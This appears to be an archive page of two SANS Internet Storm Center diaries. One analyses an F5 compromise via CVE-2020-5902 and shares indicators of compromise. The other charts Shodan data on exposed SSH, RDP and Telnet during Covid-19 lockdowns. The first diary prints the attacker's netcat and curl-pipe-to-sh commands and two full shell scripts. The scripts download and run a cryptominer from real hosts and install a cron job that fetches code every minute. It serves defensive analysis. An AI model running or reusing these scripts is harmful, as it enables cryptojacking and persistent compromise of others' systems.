Archive for July 21st, 2020

A few IoCs related to CVE-2020-5902, (Wed, Jul 22nd)

I know I am a bit late to the game, but a couple of weeks ago I responded to an incident resulting from an F5 compromise related to CVE-2020-5902.  As I responded I captured a number of indicators of compromise.  While I have not had a lot of time to dig into them, hopefully they will be of use to somebody.

The F5 vulnerability, CVE-2020-5902, was announced, and patches and workarounds made available, by F5 on June 30, 2020.  It carries a CVSS score of 10, which in practice meant that if the management interface of the F5 was exposed to the Internet, it was trivial to exploit.

On this particular F5, probes for the presence of the vulnerability began on July 3, 2020, and over the subsequent 4 days the device was probed for CVE-2020-5902 2,561 times from 364 unique IPs.

The first detectable exploit attempt was executed against the F5 on July 4, 2020.  Exploit attempts continued a number of times over the next few days.  It is hard to gauge their effectiveness, but there is no indication that any of them achieved a foothold on the F5.

The first detectable foothold on the F5 was established on July 6, 2020.  As shown in an earlier diary, an alias was used to get access to a shell, which was used to execute:

nc 217.12.199.179 9999

which resulted in the execution of:

curl 217.12.199.179/i.sh | sh

As of this writing, 217.12.199.179 is still up and still serving the shell scripts related to this attack.

Here are the contents of i.sh.  SHA-256 34e0ad00a23762da270ad5a352d1e523f45a685b4a4931ae02973ecef79140c5
https://www.virustotal.com/gui/file/34e0ad00a23762da270ad5a352d1e523f45a685b4a4931ae02973ecef79140c5/detection

#!/bin/sh
ulimit -n 65535
rm -f /etc/ld.so.preload

LDR="wget -q -O -"
if [ -s /usr/bin/curl ]; then
 LDR="curl"
fi
if [ -s /usr/bin/wget ]; then
 LDR="wget -q -O -"
fi


WGET="wget -O"
if [ -s /usr/bin/curl ]; then
 WGET="curl -o"
fi
if [ -s /usr/bin/wget ]; then
 WGET="wget -O"
fi

DIR="/tmp"
if [ -e "/tmp/bigip" ]; then
 if [ -w "/tmp/bigip" ] && [ ! -d "/tmp/bigip" ]; then
  if [ -x "$(command -v md5sum)" ]; then
   sum=$(md5sum /tmp/bigip | awk '{ print $1 }')
   echo $sum
   case $sum in
   fa3cf35e7e83175f395a5b6d35fd456d)
    echo "bigip OK"
    ;;
   *)
    echo "bigip wrong"
    rm -rf /tmp/bigip
    sleep 1
    ;;
   esac
  fi
  echo "P OK"
 else
  DIR=$(mktemp -d)/tmp
  mkdir $DIR
  echo "T DIR $DIR"
 fi
else
 if [ -d "/var/tmp" ]; then
  DIR="/var/tmp"
 fi
 echo "P NOT EXISTS"
fi

download() {
 if [ -x "$(command -v md5sum)" ]; then
  sum=$(md5sum $DIR/bigip | awk '{ print $1 }')
  echo $sum
  case $sum in
  fa3cf35e7e83175f395a5b6d35fd456d)
   echo "bigip OK"
   ;;
  *)
   echo "bigip wrong"
   download2
   ;;
  esac
 else
  echo "No md5sum"
  download2
 fi
}
download2() {
 $WGET $DIR/bigip https://bitbucket.org/sozmon3n3/git/raw/master/bigip
 chmod +x $DIR/bigip
 if [ -x "$(command -v md5sum)" ]; then
  sum=$(md5sum $DIR/bigip | awk '{ print $1 }')
  echo $sum
  case $sum in
  fa3cf35e7e83175f395a5b6d35fd456d)
   echo "bigip OK"
   ;;
  *)
   echo "bigip wrong"
   download3
   ;;
  esac
 else
  echo "No md5sum"
  download3
 fi
}

download3() {
 $WGET $DIR/bigip http://217.12.199.179/bigip
 chmod +x $DIR/bigip
 if [ -x "$(command -v md5sum)" ]; then
  sum=$(md5sum $DIR/bigip | awk '{ print $1 }')
  echo $sum
  case $sum in
  fa3cf35e7e83175f395a5b6d35fd456d)
   echo "bigip OK"
   ;;
  *)
   echo "bigip wrong"
   ;;
  esac
 else
  echo "No md5sum"
 fi
}

download
SKL=b $DIR/bigip

crontab -l | grep -e "217.12.199.179" | grep -v grep
if [ $? -eq 0 ]; then
 echo "cron good"
else
 (
  crontab -l 2>/dev/null
  echo "* * * * * $LDR http://217.12.199.179/b.sh | sh > /dev/null 2>&1"
 ) | crontab -
fi

i.sh adds a cron job that runs every minute (* * * * *), fetching b.sh from the same IP and piping it straight into sh.  Note that both scripts start by deleting /etc/ld.so.preload, which disables any LD_PRELOAD-based hooking present on the host, and that b.sh repeats the same crontab check, so the entry is re-added each minute if it has been removed.

Here are the contents of b.sh.  SHA-256 9994a3ab51521ee54902826d46de3f8c541e625873f10aec2568dd51ddf78f9c
https://www.virustotal.com/gui/file/9994a3ab51521ee54902826d46de3f8c541e625873f10aec2568dd51ddf78f9c/detection

#!/bin/sh
ulimit -n 65535
rm -f /etc/ld.so.preload

LDR="wget -q -O -"
if [ -s /usr/bin/curl ]; then
 LDR="curl"
fi
if [ -s /usr/bin/wget ]; then
 LDR="wget -q -O -"
fi

crontab -l | grep -e "217.12.199.179" | grep -v grep
if [ $? -eq 0 ]; then
 echo "cron good"
else
 (
  crontab -l 2>/dev/null
  echo "* * * * * $LDR http://217.12.199.179/b.sh | sh > /dev/null 2>&1"
 ) | crontab -
fi

i.sh also downloads an executable called bigip (first from a Bitbucket raw URL, falling back to the same IP), checks it against the hard-coded MD5 fa3cf35e7e83175f395a5b6d35fd456d, and runs it with SKL=b in its environment.  On this F5 the file landed in /var/tmp and launched a daemon process, /tmp/bigipdaemon.

c44b63b1b53cbd9852c71de84ce8ad75f623935f235484547e9d94a7bdf8aa76 bigip
https://www.virustotal.com/gui/file/c44b63b1b53cbd9852c71de84ce8ad75f623935f235484547e9d94a7bdf8aa76/detection

517168df462fd33d5946f8cc6a09090d1dfdac19b10ac8ef8e15e4583557749d  bigipdaemon
https://www.virustotal.com/gui/file/517168df462fd33d5946f8cc6a09090d1dfdac19b10ac8ef8e15e4583557749d/detection

Both files are a cryptominer which mines cryptocurrency on behalf of the attacker.  The firewall logs clearly show the miner communicating with the IP in Ukraine from which the shell scripts were downloaded.

Besides the IP associated with the cryptomining, the attacker also communicated with 9 other IPs.

Cryptominer IP

destination_address   destination_port   Country
217.12.199.179        80                 Ukraine

Other associated IPs

destination_address   destination_port   Country
193.26.217.129        80                 Russia
193.53.127.188        80                 Russia
213.226.114.20        80                 Russia
213.32.10.148         80                 France
45.8.228.49           80                 Russia
5.23.52.131           80                 Russia
62.109.25.117         80                 Russia
95.142.44.164         80                 Russia
217.8.117.137         80                 Russia

I hope to get some time in the next few weeks to dig into this further, but hopefully this is of some use to someone in the meantime.  If anyone has any more related IoCs,  please include them in the comments or send them on via the ISC contact page and I will update this diary with the new findings.

— Rick Wanner MSISE – rwanner at isc dot sans dot edu – http://namedeplume.blogspot.com/ – Twitter:namedeplume (Protected)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.


Couple of interesting Covid-19 related stats, (Tue, Jul 21st)

It is nothing new that Covid-19 forced many organizations around the world to quickly adopt the “work from home” model, which in turn resulted in an increased number of machines offering remote access services and protocols accessible from the internet[1,2].

While this is true, going over data gathered from Shodan over this year I noticed that an interesting correlation exists in some cases between the number of machines with accessible protocols for remote access and regionally implemented restrictions on free movement. I call it “interesting” because although one might expect such a correlation to exist, one would probably expect it to always be strongly positive, i.e. that with increased restrictions on free movement would come a significant increase in the number of machines with SSH, Telnet, RDP, VNC, etc. accessible from the internet, followed by a significant decrease following lifting of the restrictions.

That is not always the case, however, and given the inherent risk of allowing unrestricted access to these services from an untrusted external network, I thought it might be interesting to take a short look at recent developments in the number of IPs exposing SSH, RDP and Telnet to the internet in a couple of different countries.

A good example of a country where the “expected” increase in numbers may be seen would be Canada. There, both the number of IP addresses exposing these protocols and the percentage of the country's ISP-allocated IP space they represent saw a significant increase between the time restrictions on free movement were implemented and the time they were lifted (a large thanks goes to my colleague @inarumlova for providing me with the relevant dates for almost 60 different countries). Since then the numbers have stayed fairly high, however, with only a small drop in the number of IPs with exposed RDP.

Things were a bit more interesting in Austria. There, the number of IPs exposing remote access protocols rose while restrictions on free movement were in place (and, in the case of SSH, fell significantly for a while after the restrictions were lifted), while the percentage of Austrian IP space visible to Shodan that those IPs represented steadily decreased.

So far, the expectation of a significant increase in the number of IP addresses with exposed remote access protocols during any “lockdown” period held true.

A country where this expectation would prove to be wrong – at least in the case of RDP – would be the United States. This may be because most restrictions on free movement put in place in the US were enforced only on a regional or at most state level, or perhaps because organizations in the US chose to provide access to the protocols we’re interested in only through VPN connections. This is only speculation, however. Whatever the reason, although we may see a steady increase for both SSH and Telnet since the beginning of March, the number of IP addresses with exposed RDP first fell significantly at the beginning of the year and then remained more or less constant, with only a couple of temporary increases visible in the data following implementation of the first travel restrictions.

As we may see, the regional trends don’t necessarily always follow the global ones and may sometimes even be a bit counterintuitive…

[1] https://untrustednetwork.net/en/2020/04/02/open-ports-in-the-time-of-corona/
[2] https://blog.shodan.io/trends-in-internet-exposure/

———–
Jan Kopriva
@jk0pr
Alef Nula

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
